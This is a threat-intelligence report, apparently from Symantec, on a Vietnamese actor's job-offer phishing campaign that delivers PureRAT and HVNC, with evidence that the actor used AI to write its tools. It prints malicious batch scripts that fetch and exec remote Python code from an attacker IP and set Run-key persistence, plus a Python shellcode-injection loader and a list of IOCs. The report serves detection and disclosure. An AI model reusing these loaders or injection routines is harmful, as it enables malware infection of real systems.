PureRAT: Attacker Now Using AI to Build Toolset
Vietnam-based cybercrime actor appears to now be using AI to write scripts used in phishing campaigns
- Multiple tools used by the attacker bear hallmarks of having been developed using AI, such as detailed comments and numbered steps in scripts, and instructions to the attacker in debug messages.
- Attacks begin with phishing emails, usually masquerading as job offers.
- Attacker is based in Vietnam and may be selling access to compromised organizations to other actors.
A Vietnamese threat actor is likely using AI to author code powering an ongoing phishing campaign delivering the PureRAT malware and other payloads. The phishing emails masquerade as job opportunities and the attacker may be using them as a lure in the hope that recipients open the emails using work computers. The attacker’s usage of AI provides further evidence that the technology is being used by lower-skilled attackers to assist with developing tools and automating their attacks.
Evolving attack chain
The campaign, which was first documented by Trend in December 2025, begins with emails using job opportunities or offers as lures. While Trend reported that the emails featured malicious ZIP or RAR archive attachments, recent examples seen by Symantec were hosted on Dropbox, with the phishing emails likely containing links and instructions to download the file. The attacker may have changed tactics in the belief that downloads from a known cloud service may be less likely to raise red flags than attachments.
If the ZIP archives are opened, they initiate an infection chain leading to the installation of PureRAT or another payload such as a HVNC. Malicious archives found by our Threat Hunter Team include:
- New_Remote_Marketing_Opportunity_OPPO_Find_X9_Series.zip
- Global_Ads_Strategy_Role_Summary.zip
- Project Management and Implementation Plan VH.zip
- HNR_Project_Progress_And_Development.zip
- Executing_operations_to_the_highest_standard.zip
- OPPO_FindX9_New_Product_Promotion_Plan.zip
- Advertising_and_Marketing_Henkel-AG_Smartwash.zip
- SAMSUNG_OLED_G5_Marketing_Dossier.zip
- Duolingo_Marketing_Skills_Assessment_oct.zip, Duolingo_Marketing_Skills_Assessment_oct.rar
- American Giant promotional material.rar
- Action Plan for Project Execution Z7.zip
The archives usually contain an executable, which is then used to sideload a malicious DLL. In many cases, the executable used for sideloading was the Haihaisoft PDF Reader or an old version of Microsoft Excel (Trend, meanwhile, reported that the attackers were using a renamed version of the Foxit PDF reader for sideloading). In other cases, the attackers renamed the executable to masquerade as something else. Some of the names of the executables include:
- adobereader.exe
- Salary and Benefits Package.EXE
- Salary and Benefits.exe
- 2.OPPO FindX9 Compensation Benefits Responsibilities.exe
- 2.Remuneration_Packages_and_Employee_Benefits.exe
- 2.Salary-benefits-bonus-KPIs(Job responsibilities).exe
- 2.Salary_And_Responsibility_Table.exe
- Duolingo_Marketing_Skills_Assessment_oct.exe
Filenames for the malicious DLLs included: oledlg.dll, msimg32.dll, version.dll, and profapi.dll. These DLLs usually act as loaders for malicious batch scripts.
One of the batch scripts analysed by our Threat Hunter Team appeared to be very likely authored using AI.
@echo off
setlocal enabledelayedexpansion
:: Tạo thư mục ẩn nếu chưa tồn tại
set "targetDir=%LOCALAPPDATA%\Google Chrome"
if not exist "!targetDir!" (
mkdir "!targetDir!"
attrib +h +s "!targetDir!"
)
:: Đổi tên file giả dạng
ren "document.pdf" "huna.zip" >nul 2>nul
ren "document.docx" "huna.exe" >nul 2>nul
:: Giải nén zip bằng 7z hoặc tương đương
"huna.exe" x "huna.zip" -p"huna@dev.vn" -o"!targetDir!" -y >nul 2>nul
:: Dòng code Python cần chạy
set "CODE=import requests,base64;exec(base64.b64decode(requests.get('http://196.251.86.145/huna2').text))"
:: Chạy zvchost.exe với đoạn mã Python (ẩn cửa sổ)
start "" /b "!targetDir!\zvchost.exe" -c "!CODE!"
:: Thêm vào Startup (escape toàn bộ chuỗi đúng cách)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" ^
/v "ChromeUpdate" ^
/d "\"!targetDir!\zvchost.exe\" -c \"!CODE!\"" ^
/f >nul 2>nul
:: === THÊM: Tìm và chạy file .pdf trong thư mục đích ===
for /f "delims=" %%F in ('dir "!targetDir!\*.pdf" /a-d /b /s 2^>nul') do (
echo Found PDF: "%%F"
start "" "%%F"
goto :after_pdf
)
:after_pdf
:: Trả lại tên file gốc
ren "huna.exe" "document.docx" >nul 2>nul
ren "huna.zip" "document.pdf" >nul 2>nulexit
When executed, the batch file creates a hidden directory under %LOCALAPPDATA%\Google Chrome. It then takes locally saved, innocuously named document.pdf and document.docx files and renames them to huna.zip and huna.exe. The latter is usually a renamed version of 7zip or WinRAR and is used to open huna.zip into the previously created hidden Chrome directory using a hardcoded password (huna@dev.vn). It then runs a Python interpreter (zvhost.exe) from this hidden directory with a Python command that fetches Base64 encoded code for the payload from the following URL: http://196.251.86[.]145/huna2.
After decoding and running the payload, it then creates a persistence mechanism by adding itself to the current user’s Run key, ensuring that the same Python script runs at every logon, masquerading as ChromeUpdate. In some cases, a scheduled task is created, with various names, such as 123456.exe.
After the persistence mechanism is create it then opens a benign PDF from the same hidden directory, most likely to continue to trick the target into believing they’re simply opening a document. Finally, it renames huna.exe and huna.zip back to document.docx and document.pdf.
Virtually every step in the batch file has a detailed comment in Vietnamese. This level of commenting is rare outside of scripts authored using AI, particularly in malicious files, which usually contain no comments or minimal comments.
Another version of this batch file had a more streamlined set of instructions and even more evidence of AI assistance.
@echo off
setlocal enabledelayedexpansion
set "targetDir=%LOCALAPPDATA%\Google Chrome"
set "exePath=!targetDir!\zvchost.exe"
if not exist "!targetDir!" (
mkdir "!targetDir!" >nul 2>&1
attrib +h +s "!targetDir!" >nul 2>&1
)
ren document.pdf huna.zip >nul 2>&1
ren document.docx huna.exe >nul 2>&1
huna.exe x huna.zip -p"huna@dev.vn" -o"!targetDir!" -y >nul 2>&1
:: ✅ Kiểm tra tồn tại
if not exist "!exePath!" exit /b
:: 🔥 CHẠY VỚI WORKING DIRECTORY ĐÚNG
start "" /min /D "!targetDir!" "!exePath!" huna
:: Khôi phục tên
ren huna.exe document.docx >nul 2>&1
ren huna.zip document.pdf >nul 2>&1
Many AIs have a tendency to insert emojis in code comments because they’ve been trained using data from social platforms such as Reddit.
In addition to the batch scripts, several examples of Python code that acted as loaders for the final payload were also very likely written with the assistance of AI. Below is an excerpt from a Python script used to load a HVNC payload:
# === STEP 1: Base64 shellcode ===
shellcode_b64 = "BASE64SHELLCODE (too large to be put here)" #NHỚ dán shellcode base64 HVNC vào đây
if not shellcode_b64.strip():
print("[-] Chưa có shellcode base64. Thêm vào biến shellcode_b64.")
sys.exit(1)
shellcode = base64.b64decode(shellcode_b64)
# === STEP 2: Windows API constants ===
CREATE_SUSPENDED = 0x4
MEM_COMMIT = 0x1000
PAGE_EXECUTE_READWRITE = 0x40
PROCESS_ALL_ACCESS = 0x1F0FFF
STARTF_USESHOWWINDOW = 0x00000001
SW_HIDE = 0
# === STEP 3: Structs ===
class STARTUPINFO(ctypes.Structure):
fields = [
("cb", wt.DWORD),
("lpReserved", wt.LPWSTR),
("lpDesktop", wt.LPWSTR),
("lpTitle", wt.LPWSTR),
("dwX", wt.DWORD),
("dwY", wt.DWORD),
("dwXSize", wt.DWORD),
("dwYSize", wt.DWORD),
("dwXCountChars", wt.DWORD),
("dwYCountChars", wt.DWORD),
("dwFillAttribute", wt.DWORD),
("dwFlags", wt.DWORD),
("wShowWindow", wt.WORD),
("cbReserved2", wt.WORD),
("lpReserved2", ctypes.POINTER(ctypes.c_byte)),
("hStdInput", wt.HANDLE),
("hStdOutput", wt.HANDLE),
("hStdError", wt.HANDLE),
]
class PROCESS_INFORMATION(ctypes.Structure):
fields = [
("hProcess", wt.HANDLE),
("hThread", wt.HANDLE),
("dwProcessId", wt.DWORD),
("dwThreadId", wt.DWORD),
]
# === STEP 4: Load API ===
kernel32 = ctypes.windll.kernel32
VirtualAllocEx = kernel32.VirtualAllocEx
WriteProcessMemory = kernel32.WriteProcessMemory
CreateRemoteThread = kernel32.CreateRemoteThread
CreateProcessW = kernel32.CreateProcessW
ResumeThread = kernel32.ResumeThread
CloseHandle = kernel32.CloseHandle
# === STEP 5: Tạo tiến trình InstallUtil.exe ngầm (ẩn cửa sổ) ===
target_path = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
if not os.path.exists(target_path):
print("[-] Không tìm thấy đường dẫn InstallUtil.exe")
sys.exit(1)
startupinfo = STARTUPINFO()
startupinfo.cb = ctypes.sizeof(startupinfo)
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_HIDE
process_info = PROCESS_INFORMATION()
success = CreateProcessW(
target_path, None, None, None, False,
CREATE_SUSPENDED, None, None,
ctypes.byref(startupinfo),
ctypes.byref(process_info)
)
if not success:
print(f"[-] CreateProcessW failed with error: {kernel32.GetLastError()}")
sys.exit(1)
print(f"[+] Created suspended process PID: {process_info.dwProcessId}")
# === STEP 6: Inject shellcode vào process mới ===
addr = VirtualAllocEx(process_info.hProcess, None, len(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
if not addr:
print("[-] VirtualAllocEx failed")
sys.exit(1)
written = ctypes.c_size_t(0)
if not WriteProcessMemory(process_info.hProcess, addr, shellcode, len(shellcode), ctypes.byref(written)):
print("[-] WriteProcessMemory failed")
sys.exit(1)
print(f"[+] Injected {written.value} bytes at address: 0x{addr:08X}")
# === STEP 7: Chạy shellcode thông qua remote thread ===
thread_handle = CreateRemoteThread(process_info.hProcess, None, 0, addr, None, 0, None)
if not thread_handle:
print("[-] CreateRemoteThread failed")
sys.exit(1)
print("[+] Shellcode is running inside InstallUtil.exe")
# === STEP 8: Đóng handle (optional) ===
CloseHandle(process_info.hThread)
CloseHandle(process_info.hProcess)
CloseHandle(thread_handle)
Each step in the code is numbered with explanatory comments and debug messages in a mixture of Vietnamese and English. The code even contains comments with instructions for the attacker, e.g. “Remember to paste the base64-encoded HVNC shellcode here”.
The attacker appears to be continually refining their attack chain. Multiple variants of scripts were found. Infrastructure also appeared to be regularly chained. In some cases the payload was downloaded from a hardcoded IP address, in others it was downloaded from Gitlab.
Vietnamese threat actor?
Aside from the Vietnamese comments in the code, @dev.vn addresses appear in three passwords used by the attackers – the aforementioned “huna@dev.vn”, “hwan@dev.vn" and “hwanxkiem@dev.vn”. Hwanxkiem appears to be a phonetic variation of Hoàn Kiếm, a district in the Vietnamese capital of Hanoi. One of the file names used by the attacker - nvmeikxnawh.zip – includes the word Hwanxkiem reversed.
The Gitlab account used by the attacker is another variation on the word, in this case with the syllables reversed: gitlab[.]com/kimxhwan. It is unclear what the name and handle on the account (Earlie Waverley and @earliewaverleyfb355) refer to. The name “Huna” is consistently used by the attacker in filenames and password. It doesn’t appear to correspond to any Vietnamese word and may be a handle used by the attacker.
The motivation behind the attacks is more likely to be cybercrime than espionage. The range of organizations targeted and the different lures used suggests a wide ranging trawl rather than targeted activity. The attacker may be casting their net for jobseekers in multiple countries in the hope that they open the emails on their work computer. The malware payloads may then be used to obtain a foothold on these networks in order to sell access on to other attackers.
The use of AI by this attacker is in line with what we see as the primary malicious use case for AI at present. As outlined in our recent whitepaper, AI can help lower the barrier to entry for less skilled attackers, helping them to write code and build out attack toolkits.
Protection/Mitigation
For the latest protection updates, please visit the Symantec Protection Bulletin.
Indicators of Compromise
If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.
06ad3e407d5370648350e64e11278fc974197ae26fa02457c5dea645d3936bc1 – Batch script
0a683540902704d640041438fd585bf4e0636d37c1711c1893bb09c10e854928 – Batch script
10debd8d5819879435d349855e7792b57b94334251357b3580dd4dd3311246c3 – Batch script
1280cba4e109220ce4b17e722a55f31977112df3fa170b417f67227483677cc5 – Archive
12a7f1aec5303e3e2eee59d9616b7e440f9c877d0db76620e8768c85433f3762 – Sideloaded DLL
21779c1ca04a01a58b31d6a2dabaaee4a83d839922535d6520e629699adaf6be – Batch script
21aba2329d9a6f68fdc358c487a54523beb8ee7751ec69779f53df09b14f5e10 – Batch script
2caaf6ec466cd38dccd20a5555633e20d11ee3b345e0b93e12daabdffa676228 – Batch script
2d0da28f388a9870184d0ac3905cd61947cf18830245f204033200a27c2dc3c0 – Batch script
2e92c68a1d4447275e4f35e9726779c72388a6f74ddfad9b73f0c02aa5b480c4 – Batch script
31dbfc89186553536f88cde60228024edbcb7fb042da6be05d75653a87999cc0 – Sideloaded DLL
397eed8ff076484896dd40fefa697f714d1f2a06e1dfacf90e821283f10b41e6 – Sideloaded DLL
3e927da764492a8122c822ab566956a65f255bd6da9f312e8e72f4d9856b8225 – Sideloaded DLL
415a2eded0537280c574ff8927c6ffafb7685487ce01fdee9185425ff09770ac – Sideloaded DLL
46dc25ffcae19255b07489403f4c1050bf7a71e5e678ffdf9b41d19b9e0467b4 – Legitimate Text2pdf used for side-loading
4728b3b51c10ec8d03d4fa82172df4ea96c0c19249c230aa7e4202434c46ba19 – Batch script
49d3fe3a00d8d3e247a3462e334ecd204dc9378c48ba55f19fc2a6c07ca7fd6b – Sideloaded DLL
4f52905aef07da42553fb843022efcfa985ad7ee7fd8a0cc58cddcd65290ccf9 – Batch script
5044d19ed26c72423e1039cc8c02631639a21287d1f885500bc089c6375fa719 – Python HVNC payload
5524b58ed2ee28c592d08a884711cb503355491dc6b474ed95a842944e7ced3b – Python HVNC payload
58f029907441888fcb38bc7ef3cb854f79f47a78ef8363b8420c7c95a60c63a7 – Batch script
5b5d67a4fb1ff53f39988d34ea2adf62f09d6aac685c2d17f6336202eff217ee – Sideloaded DLL
66fbf7bf5040308f4a194a6259d6490958d03ae3105964d53fd35e42a9a40197 – HVNC payload
6fe62e780bacbdf22c7cf522dc84d9a9757cf80980e43b5a3a6d4a98a1f4b61a – Python HVNC payload
70defb76cc82faf19e7183aa8f92ccaf3942b39524ee80610a77aa02a690b762 – Batch script
7ee96809a375c35dc03abd02cd0acdd4849af5785f7c37679d4eabb739b455c0 – Batch script
834653eff148cb83dbfdb20ec6f769d2e454fdac4fe40bbd47bf4663f796dfec – Batch script
8387e6fe5adcb90a42abdf9ed6cdfdbea66bb431f6aa7fc32d5f7137fc140090 – Batch script
8389c6564abc4a7556abdc72f399fb3339db9492628d25eda1a3cec954c0c68d – Sideloaded DLL
8a15a4a4d5158b8826b478a33e407bd1ffb39e010e0986a5547f114ffe6e9167 – Python payload
8c210acf7e491abdd73960cc6d2f3ead7872d7221af9e151cae650d6634b899c – Legitimate PDF Reader
98fef41aa11235e714b458259bba9720c2de0e88b7a190167bd0077ee1e038f4 – Python HVNC payload
9b94a6d16e357bf57e84db3a749f40231841f2a34cec414256d5c8f63facf84c – Python HVNC payload
9fdc1691e1c96acff6cb18a26f135fabaec5ceed394b28dabac068a991c4f0e7 – Batch script
a0c26e5fd249e284b403a74250cd1f5d34c6b90369b082c8050267f7efc6d15d – Batch script
a1f3c59c59eabfd89a6be69bea4d10e4a490ac6e9c931e8fa4c4b2c8e7580389 – Batch script
a6cc3ee93342adc4ac9a0e9600504199688b20fea4e9e5a06d3b3a2b6fbfc075 – Sideloaded DLL
aec135d23f695c9338e1333a8c975544053e8c2615f842b73b085bc96906696d – Batch script
b04b506eb06303d00b3f02d0dbcd20d3bfe93e4030c6db1655136198ea40e9c3 – Sideloaded DLL
b398e081284b09c8c049e319e87d74bf4df4f0423efbab9202fdc64ed7ca9fd9 – Batch script
ba2f77577811cbf5c1ba579e730e283a076157612a73137213296a3851d901ea – Batch script
bce2cd273f4610387c32bfb80ecd0402c70d97f89c57611e7f79344033da3e55 – Batch script
c09bec5f1a9e222de8cf968ffa63492542f7c5860079105895e8908d366460f6 – Benign Word document
c1c509f40ede7d4a33a092114bbab1e6b4d29fbf21f6ce5f2356902506b6c8f3 – Sideloaded DLL
c5ad8eaae4d107523300d4e6681a15a94848adb8f13516e0d00575fc32957997 – Sideloaded DLL
c5b1990c35e5f801878b8347b548356243dfb8396e22870f2db7c0d9ad9374ab – Benign Word document
d06ec13250708cab022d76b78adf8bbe3b4cf1d7f6e483f2624c18d232e3f896 – Batch script
d293aa394efe4112ed95951aafc43e04975d8c9d715dcb170b4d3ae0cec8af5b – Batch script
d3fb96a634269b8fb1cc1edaa2c4fdcff60aab887da7de4dc9f7c968c9bb49b1 – Batch script
d45eb4b8130132055b44ffe4462888d5bb90f11ac0c07312d09b8b8abc0b23ce – Batch script
da37825fb5428c6788db3296b0bfaaa8197704699bcdb240d8b032350faa59ae – Sideloaded DLL
dc0a8a417b64193d507839c57c3718d5ccfcade6cb917ae6c729be166edc5b9b – Legitimate PDF reader
dcefa82d7ac6887a253effb54d611e8df15177a993c7d53e453e5ea92f404983 – Batch script
de1ed295857e5551dd7ff1ff34f92d670ef237acf3c4326ddd94bf0956b6a807 – Batch script
de2f6a3056f74e104e0e9134c2652662a8fc0e9ccf519e83c033b6df0a98ae05 – Batch script
df38de5eb1f5d534e1a836fbf34552bc80d722bb5301976707ee2dd78997bfc5 – Batch script
e59655948efb89b4d905dd4bbbac28c7a06e4a03ec5bc93b9ea1c0a43f91bfcf – Sideloaded DLL
e62e0851ddf145c3c2c1fb1fbccb7252dce0edd427c8ba74d9b6ff813c36c728 – Sideloaded DLL
e927e64c4d88c19d708dca504bcf220fd25cbc6fa91e573eba97e52d745288fc – Batch script
ea0630d4582cbf033fa75d4ce1f1e8371181ed58d7961f0c98b66f458ca46c45 – Sideloaded DLL
ecb67b475457fdd3bfbb7a0911b657a1eb8343ca982e5037b062914d991e772e – Sideloaded DLL
efe49c9134756beba5b475b5e396fdf72a917bb007310bb69d4299c10259ee42 – Batch script
effba77be35fb75299883957d3acf9560970a054bc85d20457552e3511293cd0 – Sideloaded DLL
f2d07dd0dda0c0fd94427fa03b5fd83a73933904678b35afd8723130d65196e0 – Batch script
f35958930f3f4e8a13f09c2c3eba4771652b6a03338913ddeb6b0278c306bec6 – Sideloaded DLL
f3c54064ae75e0f7aaec74acf749716d15f8f1856f002f5ccb3bcb9daf140171 – Batch script
F83cf38fd1315530c6d325eb5082c1fe38e0037fdd28dec5e7e2bdd6cd75e3ed – Sideloaded DLL
fae70495819c22d4563d2ece75b4dce210635ebc3136b69365b40564f26b7efa – Batch script
fcd644e03e1958122feb1b7163df49927bb4e4d09c51948b5950e5d809ecf955 – Batch script
http://116.202.214[.]234/huna
http://139.99.17[.]175/test_exe/AdobeReader.exe
http://139.99.17[.]175/test_exe/msimg32.dll
http://139.99.17[.]175/test_exe/oledlg.dll
http://139.99.17[.]175/test_exe/sv_chost.exe
http://139.99.17[.]175/test_exe/version.dll
http://139.99.17[.]184/doraemon
http://139.99.17[.]184/huna
http://144.172.116[.]103/huna
http://196.251.86[.]145/huna
http://196.251.86[.]145/huna2
http://217.217.253[.]186/huna10
http://217.217.253[.]186/huna9
http://51.79.214[.]125/huna
http://51.79.214[.]125/huna2
http://51.79.214[.]125/huna3
https://dl.dropboxusercontent[.]com/scl/fi/59d5r1yxdchrqvhfiyaq0/Executing_operations_to_the_highest_standard.zip?rlkey=ynlo8uc56506b9fa5sdomazhx&st=euu2j0jj&dl=0
https://dl.dropboxusercontent[.]com/scl/fi/b268eenis4r9i8r3aaj1t/OPPO_FindX9_Candidate_Guide.rar?rlkey=241h69yf5n14lm5njd05kva5l&st=0vzw0az8&dl=0
https://dl.dropboxusercontent[.]com/scl/fi/bn95kutel2n8gcqzm29pd/New_Remote_Marketing_Opportunity_OPPO_Find_X9_Series.zip?rlkey=4udwkctm0kffvl5o46ovmcub7&st=ipgw7lgs&dl=0
https://dl.dropboxusercontent[.]com/scl/fi/co3uwts5yjwpkv81ah9d5/Global_Ads_Strategy_Role_Summary.zip?rlkey=x6rnh8dg6nykwhzsfg6e9z47u&st=aps5we2c&dl=0 https://dl.dropboxusercontent[.]com/scl/fi/uefer36kfpiocoblp7g9n/HNR_Project_Progress_And_Development.zip?rlkey=izjft9z5gj6wruqla5zmg93up&st=78pi42mn&dl=0
https://dmca-wipo[.]com/nauh
https://ginten555333[.]com/Libraries/PythonCode
https://ginten555333[.]com/Libraries/UnZipV2
https://ginten555333[.]com/Libraries/VahGG.html
https://ginten555333[.]com/LibraryInstalling/PyCharm
https://gitlab[.]com/children157/mr-wolf/-/raw/main/mrwolf?inline=false
https://gitlab[.]com/hwan5471422/hwan/-/raw/main/Final_Doraemon?inline=false
https://gitlab[.]com/kimxhwan/kimxhwan/-/raw/main/kimxhwan?inline=false
https://release-assets.githubusercontent[.]com/github-production-release-asset/135854144/9453630a-3a22-4a1f-b56a-87d594ec2bfe?sp=r&sv=2018-11-09&sr=b&spr=https&se=2025-10-20T06%3A18%3A28Z&rscd=attachment%3B+filename%3Drpcs3-v0.0.38-18249-0c4e7fc1_win64_msvc.7z&rsct=application%2Foctet-stream&skoid=96c2d410-5711-43a1-aedd-ab1947aa7ab0&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skt=2025-10-20T05%3A17%3A50Z&ske=2025-10-20T06%3A18%3A28Z&sks=b&skv=2018-11-09&sig=J3%2BE%2BPBLC7cfn1Fvq0WjUkQOti4QSmFhK%2FBRwwgjtmA%3D&jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmVsZWFzZS1hc3NldHMuZ2l0aHVidXNlcmNvbnRlbnQuY29tIiwia2V5Ijoia2V5MSIsImV4cCI6MTc2MDkzOTI3NSwibmJmIjoxNzYwOTM3NDc1LCJwYXRoIjoicmVsZWFzZWFzc2V0cHJvZHVjdGlvbi5ibG9iLmNvcmUud2luZG93cy5uZXQifQ.Z1uQODdqrQTTXjrL_VMOha20XGXa9bNQBZfIiqB77Uo&response-content-disposition=attachment%3B%20filename%3Drpcs3-v0.0.38-18249-0c4e7fc1_win64_msvc.7z&response-content-type=application%2Foctet-stream https://uc052f7e086998a45432c8803ea1.dl.dropboxusercontent[.]com/cd/0/get/Cys-s2WZ0h5J8HdXmXhBONXB2CPYeannKu6zO764wruev4rRR2gH_4QFWwEgT_g-GYxRNGpHxuTs9BeB_2j4EqK0QAIzyf45dq3Mj9k38KBT_shW5ImD7FJW3dEQ1wfbCdduMKiJTc6T3b9jaCRBvPvZ/file?dl=1#
139.99.17[.]175
144.172.116[.]103
139.99.17[.]184
217.217.253[.]186
116.202.214[.]234
103.166.185[.]228
15.235.172[.]166
192.30.139[.]187
dmca-wipo[.]com
ginten555333[.]com



